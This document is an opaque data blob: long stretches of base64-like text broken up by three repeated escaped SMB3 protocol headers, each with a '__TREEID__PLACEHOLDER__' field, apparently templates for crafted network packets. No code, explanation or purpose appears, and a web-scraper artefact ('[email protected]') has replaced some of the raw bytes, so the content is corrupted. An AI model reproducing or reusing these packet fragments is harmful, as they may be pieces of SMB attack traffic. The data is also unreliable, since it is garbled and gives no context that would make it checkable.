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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x10NmGUz934VSfya0P+NEcpH9WLQK6CEABvbM/bWAFUZwefh9JznmLY4vpuh/JmCpwx7CJi49mUSdbhhMCH/ESti9qzmx4Tuo2CZ+AMM8rK5Bdo6NCc9wjjNdjzNhjJffjYYp/RRUbsMUPc1edWttNyoUnzjwXFvRlwAN/j+1N1LA0SQ9J6Dxo10Q3KbvvJs8agu45fXTiJydIoOQqwBTem2k9T9qIMsVIWkuYlvS2+6V1hUkNKs1eyo5DBSCigzapxlzYyALW4Ks3Ro7YRbdpgGhLCTIALxM31kAVqVz6J9qS++VsjESE7yBrrQgSYQgleJBtdCGMDfO3pShQuVoxfsUvl1REfrUZe6qQU/5IWy0lPZEBQDJOr0ZZ+rfuNCVgsLzz4lhCyK/xFAiXSsKAMOjNE+sqUmNIfIgtp3tzCncUsYPtyL7ztMG3zJELQBRd6/vEPkCCSwvGmkcFK1DL4CqiuybgdJ6YEeICcw7tFFkPeAhol18WNXZtCQcSPkT/lJ9bpkmCXAyhw7gEfQC71Gw6tr4NjoH69a1AOhE+Zu3r814pDKkrjF4MtHEqAF/TWTjE6tZMG8V5Yw/Fe4wnhH1RlyklAfkfuzkx5klttyxcdNBAVZKiZ416YGZ2dq2p+L2AyaZsPpASN4dOAvXBdNcfNmjDzw975WQUuZByFsNQ7nItNmYpFiTyOp/GakLLB+nvcvI3BQgjKc8oLtz43SiTX8CtmpeMNumuY2JKG2f9f8vWq0KvW28K5DjXn/RqhDzCk6m4eTkZBv4rBmVJMQNq/KOjTpJ4bpV+ZZWWR3c7XQ5sLbFNqAV1EISLmYPY/N9KSEoEKcFsAfCFyxCS3r2sPsKMIi2VADfa+/Tbcj2FIDva922OMoS7JJrOnw+EwgCny67B7mG/ebip689Jyb3RLoDewJj33Dw9Qa6dfD5lYnN3AySP6wux2wFiKJq11DM2HIJJaRMqWmSs88LYRc1+8PKRiG8wC6+cYn01vyWZnq6aXjJ0VhrHWvcky1SHFy8i2fYBTyuBcNxWcntZeisRTik0VUSXxnI8cPKI/kXIfXJXZl7lMCe7CRSKXpamF6gnW9nYF0/bY0jDrGDOMfMlfX9gxNcRK0bNfKb/+lMKIDEgt+PTp5QuDk1crSIEZQCwIij4GAM2D3Wt0diQxBm8SdXuxluqn32euSzCZlABwd48c2DJ+8iX9UoKhenzfMi+jyxari0QtHjeYzgKy5V0oR/L730E+mhs2q36TUdaIz/W/0O3FgJKWr4yX2Pad2WinP7NSTRihMFI3Tc6a7yiG8Xipea6/rb4xKDuFdzSlt2qxO1gOq8zKrNprnQ38zGhAPDC6GZ+M0XvrnuVyyQO6sfzu+cUYuYECAzJt1URLiEny+XBa6xWTqM0fLqCC7CAHqMKnYTcA3SUmuLGfxwL0aNQJPYYCUcJiryT3FPY5lVwFhOuqmJs0Dg/d3BB0r8dAlSEVK9SMWDIjS+PXA3om/XAGSLh8ZSVijmCOwA7X2k7RVng3yFSHLUkbWSEnPM/sgMC3D2nRt9wLJmA44P8hcsWfuNL7SRflVzXQHcV2adUtkLE+HIzjwt5cE7M2UVBSSxlPC1AAirfL6XEhauy6ScUpQDzWCFtL3afWvxZjM4U0K72Ju4lWHikgBcXLlaaNEC72ENdljVIzJVoPj9zZNyxiGSo70HmT7k830DHjzB6AYJj8/dhPMgfZj/yybHuUUpy1MIu+vBnJZRDenyS4kidxn1Iv+A/+dzn1210k+024JcFvuxBUimvE7dOLB3HgM0mZDnhy6VGaryy+ZPmM1V1EM1UhSdWljpJEF1fsB1jgDrN3F7QWmYOZm/5l0CCGbRQoywKE8AyQrlECIc08bZcGqdMOFuXjoMymMn82+4Z3TwCLBgGtD9nKWoWmRXJCtn0YD1D+Na0ItJQcgUkIeAOYYNRi6WszOl849/8vD/gRrvluxBQniGB+50GjJ5b/QArC6YsTn47vTHimG4361/8CSnGU1BD+F5VsOl9f9GFrdl8m22BcEX9CcrPPVu7bIoUMdA02NkkeL489kAHKh/Qy7/+t7nxpf0lEaEbRLVZnhq38OGpWihV/spVLJsJBWiNOW5VUEmEa/myHtIgTWq2BX0ZKuFE4haQIe7hFfWyn9gyrNyRo+/NnXf52VaD2cbnqjg+jtf0bTXzHG0fIyAR12HeyKW2od5ztKmad25Jzp07o7p2fbUzFRabo563brmIMoAVOmxm1c1FJ9pgIdPXQCtbjB4ASJW6lM79qAsCCAAWtwcMe6FmfG/KcMQMSYov0lsZAT2bnAOl8qM7tGYOHfifrQP7qGDm1l5/7kFu1PBzoGusLFSHAD5wx+6ll2fNEZXmzsY1Wp8TI9WgOOOmhgiTnlRLrvzCQsiwjEak/va8HC4KXSkIPL9zAK5NdhB4pOxeH8C6IohsXLci5GzTlw3tp9N2wz57T3XWRjWfdhbqofZKzImY1KhxBRkSheiKSXoVfc+ZaXYL086Nuw3lltVnTCIsKKNipwkSM/vhd+mHT4gjeUvPEky3LB0Yi5Wjp0t2It2PyrnnzZsgKGv+luka6VN3wGGSMny+pJ0Mfyb7lXOAYF5Ocw59cWHGpEMNXHgeZGZcVXzvFKDcv6ihGeWm6Zb1dQuWkaZ9Qctn+1WEOkypSTCFbowm0+O5hVCkkGNP4P38AMA0C99BNh2QG8tyT7zSOSOc+URvdzQzyxwVtTSDgTz9eTkT4JJM4WJwa1DZLuZ/nPzmlZPYcZINLfecS5+wFVGWzys43dW3lDNYmsNIlRdH7nR3SGTXwUwsgAbOeK8MlXdFCM5Eaui8RybwHSOcE+/hutA6XFT6Aerr1rcEnOrGccXjpe5VlYBzdZv7janZ2d7k8DKIUfKrfL0Q02s4KYBrClScqHuKD+nZiAGlUF3LdVdAbKlbY0B0Of/7J6XTHXiX117oSxucY8LkL6kjuxNdUwYJwuBESmeb3FdNRtgbwvT9SHDJjqwnsYiSBgkXLG5yOwMoa9xMbTaxq6jScOR81odD7ClAylSXnuUCHbUdpyTb0cZR4Z/MnoJeyB8FmnDVicluS9fCXLtEX4BPaGEeUu8PxjEfvztqGOTvRbZqgSHUZB94hRCRtrH6HtUDPxM/iwwByADEGgeM84KLSpHzDSs5wZe2aBWnZGndNgClZmvhUvJSJ1F+MfK40MCoM1fP2TYL6iAA/NjQqFHG7TDnejw5sUnXDDfLCpD/HcKPvroPsC9qrigimwlEn4KLtEI3Ic0xpDeDiHwnOpJKWtxnz46IKnjadOn8Rwnwx9sW3wumyAzORT9pSht+NJEfVqSofR2msfVBk/nwjbPpXc9cw3Cj20My4iHG9G4ARN1GqwO2xH8vQDaUsn7Qw5fT2aY5JJdMz2vPXMYKI8QNhVbo+xa6vj7fod/QHKmKUhGD9j1MVh90zMBJK46TU8otxH+QyRypl1gLUR84ekXdh1O/zJilI9DBTj67LIG1NtO6bEti0APLCcWaQ06vgvTtMOzIHvpPgk3MHgrC9VgTwOb5sYhsVBj3oBC1L2KQXHAza+9UBML8RXx3AbWmbNv7wtGvBJ/2NlQXGEXm5G3Ecjp/i/COEUJzljxZ5ueMaaqdDj0/WXK9d/UQiHT742mCLfi/SkPkd+STSCcsLdwZ7vHDF4txL5Pa2W3ArpVLhQRoU/mNqVIyObXCm6O2atx6H7k9hHfYxX2btGBO4e9Wyz+KrieA6wXQSAIERL1SDoEq0ScCwzoUrrlcYVi+9wdjVuPzY6wN28tmhiYO7Q+UFFfP/bcJ4FTPy5qnpEnX6v+n88x+C1TSRKCzHZ9osGZF3WtNaDyBIirDNBcOtpV0TcMLaoZiSGg7YW1BrYdfwMKBsYuKJRWwZkhWE+eFof/Ewh9W8LWe7JEzAvvJYtQ7NvSw+c9ESHesxkplngceIndRgnvCLX7wXm3hfa4vmNWdsNkYmogq2NlyqNwIoati8rcwQ6B69YaXTZBG1wXqRaLa7lUDf0Irv1081m+qjzOr4bdHkla/uduD62SY1Oe4sfNcUHLpDtHW05OCUj7HyIV1cOr2a\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xd3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xe3\\\\x00\\\\x00\\\\x00\\\\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